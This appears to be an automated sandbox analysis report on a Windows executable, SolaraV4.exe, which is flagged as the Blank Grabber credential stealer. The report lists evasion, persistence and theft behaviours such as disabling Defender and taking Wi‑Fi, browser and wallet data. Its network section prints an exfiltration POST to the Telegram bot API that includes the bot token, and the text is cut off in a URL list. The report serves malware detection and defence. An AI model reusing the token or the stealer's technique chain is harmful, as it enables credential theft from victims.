Windows Analysis Report
SolaraV4.exe

Overview

General Information

Sample name: SolaraV4.exe
Analysis ID: 1525823
MD5: e95c0515d1d3bf9c2a6e0b20ba1ebd98
SHA1: 8ca53ae3b33df086bd12d7fb31ada294f699bf9d
SHA256: 2664862a4f87e91f92f17a26e6d0b0505db5a92720f2d7eb703e0f55a88eec3f
Tags: exeuser-aachum
Infos:

Detection

Blank Grabber
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
Yara detected Blank Grabber
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Modifies the hosts file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Self deletion via cmd or bat file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious Ping/Del Command Combination
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses attrib.exe to hide files
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Uses the Telegram API (likely for C&C communication)
Writes or reads registry keys via WMI
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: SolaraV4.exe ReversingLabs: Detection: 52%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 98.1% probability
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71F901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext, 108_2_00007FF7C71F901C
Source: SolaraV4.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: d:\a01\_work\4\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: SolaraV4.exe, 00000001.00000003.2466343863.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2990881493.00007FFE957E1000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\select.pdb source: SolaraV4.exe, 00000003.00000002.2991089669.00007FFE99DB1000.00000040.00000001.01000000.0000000D.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdbMM source: SolaraV4.exe, 00000003.00000002.2989395110.00007FFE904EB000.00000040.00000001.01000000.00000008.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\sqlite3.pdb source: SolaraV4.exe, 00000003.00000002.2987871066.00007FFE784F1000.00000040.00000001.01000000.0000000B.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_ctypes.pdb source: SolaraV4.exe, 00000003.00000002.2989741254.00007FFE90591000.00000040.00000001.01000000.00000006.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_sqlite3.pdb source: SolaraV4.exe, 00000003.00000002.2990037817.00007FFE90B61000.00000040.00000001.01000000.0000000A.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: SolaraV4.exe
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\myx0gned\myx0gned.pdbhP3r source: powershell.exe, 00000043.00000002.2720390881.0000016199A66000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: SolaraV4.exe, SolaraV4.exe, 00000003.00000002.2981417985.00007FFE75E15000.00000040.00000001.01000000.00000010.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\python310.pdb source: SolaraV4.exe, 00000003.00000002.2986882718.00007FFE7651B000.00000040.00000001.01000000.00000004.sdmp
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1l 24 Aug 2021built on: Thu Aug 26 18:34:57 2021 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: SolaraV4.exe, 00000003.00000002.2984685427.00007FFE760AD000.00000040.00000001.01000000.0000000F.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_bz2.pdb source: SolaraV4.exe, 00000003.00000002.2990354313.00007FFE94441000.00000040.00000001.01000000.00000009.sdmp
Source: Binary string: D:\_w\1\b\libssl-1_1.pdb?? source: SolaraV4.exe, 00000003.00000002.2981417985.00007FFE75E15000.00000040.00000001.01000000.00000010.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_socket.pdb source: SolaraV4.exe, 00000003.00000002.2989049105.00007FFE8FF81000.00000040.00000001.01000000.0000000C.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: SolaraV4.exe, 00000003.00000002.2984685427.00007FFE760AD000.00000040.00000001.01000000.0000000F.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_queue.pdb source: SolaraV4.exe, 00000003.00000002.2990592997.00007FFE94AC1000.00000040.00000001.01000000.00000012.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_ssl.pdb source: SolaraV4.exe, 00000003.00000002.2988340988.00007FFE8F3F1000.00000040.00000001.01000000.0000000E.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\myx0gned\myx0gned.pdb source: powershell.exe, 00000043.00000002.2720390881.0000016199A66000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\unicodedata.pdb source: SolaraV4.exe, 00000003.00000002.2980855878.00007FFE75D8B000.00000040.00000001.01000000.00000013.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_hashlib.pdb source: SolaraV4.exe, 00000003.00000002.2988713456.00007FFE8FF67000.00000040.00000001.01000000.00000011.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdb source: SolaraV4.exe, 00000003.00000002.2989395110.00007FFE904EB000.00000040.00000001.01000000.00000008.sdmp
Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 0000006C.00000000.2823194797.00007FF7C7250000.00000002.00000001.01000000.00000021.sdmp, rar.exe, 0000006C.00000002.2839982108.00007FF7C7250000.00000002.00000001.01000000.00000021.sdmp
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC583C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 1_2_00007FF6FFC583C0
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC59280 FindFirstFileExW,FindClose, 1_2_00007FF6FFC59280
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC71874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 1_2_00007FF6FFC71874
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC59280 FindFirstFileExW,FindClose, 3_2_00007FF6FFC59280
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC71874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 3_2_00007FF6FFC71874
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC583C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 3_2_00007FF6FFC583C0
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C72046EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 108_2_00007FF7C72046EC
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C72488E0 FindFirstFileExA, 108_2_00007FF7C72488E0
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71FE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle, 108_2_00007FF7C71FE21C
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable\ Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\ Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\ Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome\ Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\ Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\ Jump to behavior

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2857751 - Severity 1 - ETPRO MALWARE SynthIndi Loader Exfiltration Activity (POST) : 192.168.2.12:49728 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2857752 - Severity 1 - ETPRO MALWARE SynthIndi Loader CnC Response : 149.154.167.220:443 -> 192.168.2.12:49728
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
May check the online IP address of the machine
Source: unknown DNS query: name: ip-api.com
Source: unknown DNS query: name: ip-api.com
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
Source: global traffic HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
Source: SolaraV4.exe, 00000003.00000002.2977638969.00000241338C0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: SolaraV4.exe, 00000003.00000002.2977470781.0000024133870000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: blank-kf3va.in
Source: global traffic DNS traffic detected: DNS query: ip-api.com
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: unknown HTTP traffic detected: POST /bot7576687091:AAHc9LHp1oJNmPES1PMfu8JQQ9jVtHibTlc/sendDocument HTTP/1.1Host: api.telegram.orgAccept-Encoding: identityContent-Length: 726445User-Agent: python-urllib3/2.2.3Content-Type: multipart/form-data; boundary=2348e3724fb61f50595577c0e0e7908f
Source: SolaraV4.exe, 00000001.00000003.2466730148.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2471274784.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467434110.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466572649.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469682270.000002125C3BE000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467003628.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467298959.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466913159.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470903266.000002125C3BE000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469682270.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470903266.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470075262.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469813104.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467201489.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466480654.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467109257.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2471041424.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467109257.000002125C3BE000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469062237.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: SolaraV4.exe, 00000001.00000003.2467201489.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2Assur
Source: SolaraV4.exe, 00000001.00000003.2466730148.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2471274784.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467434110.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466572649.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469682270.000002125C3BE000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467003628.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467298959.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466913159.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469682270.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470903266.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470075262.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469813104.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467201489.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466480654.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467109257.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2471041424.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469062237.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: SolaraV4.exe, 00000001.00000003.2466730148.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2471274784.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467434110.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466572649.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467003628.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467298959.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466913159.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470903266.000002125C3BE000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470903266.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470075262.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469813104.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467201489.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466480654.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467109257.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2471041424.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467109257.000002125C3BE000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469062237.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: SolaraV4.exe, 00000003.00000003.2496514190.0000024132E88000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2668174875.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2974439569.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2658597789.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2967612000.0000024132E7E000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2679350163.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2677235249.0000024132E7F000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2660879553.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2637075073.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2821702107.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2614558332.0000024132E7F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
Source: SolaraV4.exe, 00000001.00000003.2470582836.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: SolaraV4.exe, 00000003.00000003.2575357511.00000241333F6000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2965972242.000002413366F000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2966812654.0000024132C0F000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2966812654.0000024132BF9000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2977294180.0000024133675000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2968184638.0000024132C43000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2973950151.0000024132C44000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2967612000.0000024133041000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2967549443.0000024132C10000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2968142363.0000024133674000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2975526442.00000241333D4000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2974439569.0000024133041000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2973573167.0000024132BF9000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2975526442.00000241333F6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2759210113.000002D87BCD0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.3724987545.00000198520B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000043.00000002.2807229307.00000161B17F6000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000045.00000003.3048680197.00000270AE649000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000045.00000003.3048283576.00000270AE649000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000045.00000002.3052583503.00000270AE649000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000045.00000003.3050867328.00000270AE649000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 0000000E.00000002.2764906362.000002D87C025000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.m
Source: powershell.exe, 0000000E.00000002.2764906362.000002D87C044000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.mic
Source: powershell.exe, 0000000E.00000002.2764906362.000002D87C044000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micft.cMicRosof
Source: SolaraV4.exe, 00000001.00000003.2470582836.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: SolaraV4.exe, 00000001.00000003.2470582836.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469682270.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: svchost.exe, 0000001C.00000002.3724670065.0000019852000000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: SolaraV4.exe, 00000001.00000003.2469813104.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467201489.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digi
Source: SolaraV4.exe, 00000001.00000003.2466730148.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2471274784.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467434110.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466572649.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469682270.000002125C3BE000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467003628.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467298959.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466913159.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469682270.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470903266.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470075262.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469813104.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467201489.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466480654.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467109257.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2471041424.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469062237.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: SolaraV4.exe, 00000001.00000003.2466730148.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2471274784.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467434110.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466572649.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467003628.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2467298959.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2466913159.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470903266.000002125C3BE000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470903266.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2470075262.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000001.00000003.2469813104.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, 